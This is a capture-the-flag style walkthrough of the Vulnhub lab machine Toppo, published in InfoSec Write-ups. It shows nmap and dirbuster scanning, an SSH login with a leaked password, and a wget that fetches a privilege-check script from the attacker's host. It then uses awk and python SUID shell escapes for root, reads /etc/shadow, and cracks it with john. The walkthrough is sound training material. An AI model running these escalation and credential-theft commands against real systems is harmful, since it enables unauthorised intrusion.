Vulnhub Write-up — Toppo

Yash Anand
InfoSec Write-ups
Published in
4 min readApr 7, 2019

This is the write-up of the Machine Toppo from Vulnhub.

DIGEST

Toppo is a beginner friendly machine based on a Linux platform. With the help of note.txt from the admin got the user and exploiting SUID Executables to gain the Root.

Machine Author: Hadi
Machine Type: Linux
Machine Level: Beginner

The IP address is given so no need for netdiscover.

Scanning The Network

nmap -sC -sV 192.168.0.103
man nmap
nmap on Toppo

Dirbuster on port 80

Dirbuster Result

Got the notes.txt under admin directory.

/admin/notes.txt

Above notes gives us the password:- 12345ted123

So let's try to guess the username ted and try to login into ssh.

Own User

Login into ssh
$whoami ;id
man whoami ;id
Own User

Privilege Escalation

I am using this script to find out the privilege escalation methods.

$python -m SimpleHTTPServer

Starting the web server locally to upload the privchecker on the toppo machine.

starting python server

Finding the Host machine IP address.

host machine IP

Downloading the script on the machine(toppo)


$wget http://192.168.0.105:8000/linuxprivchecker.py
man wget
Downloading the privchecker in toppo
$chmod +x linuxprivchecker.py
$ ./linuxprivchecker.py

Running the script on toppo.

Running privchecker

It will give some way to Escape Sequences, I am trying using awk, you can try any of them.

Output

Root using awk

$ awk 'BEGIN{system("/bin/sh")}'
man awk
Own user using awk

/bin/bash did not give us root, this is because bash has privilege escalation protection. but there is no such thing in /bin/sh.

Let's try a different method for Privilege Escalation while searching on the internet I found this article.

Root using python

find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
snap from the above URL
FInding the perm

python2.7 can exploitable. See the SUID bits

$python2.7 -c “import pty; pty.spawn(‘/bin/sh’);”
Own user using python

Cracking the root password

$awk 'BEGIN{system("cat /etc/shadow")}'
/etc/shadow file
awk 'BEGIN{system("cat /etc/passwd")}'
/etc/passwd file
$unshadow passwd shadow < crack
man unshadow
unshadow passwd & shadow file
john --wordlist /usr/share/john/password.lst crack
man john
finding the hash type using the john
john --wordlist /usr/share/john/password.lst crack --format =sha512crypt
cracking the root password using the john

Own Root

Own root using the password
FLag

0wnedlab{p4ssi0n_c0me_with_pract1ce}

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

No responses yet

What are your thoughts?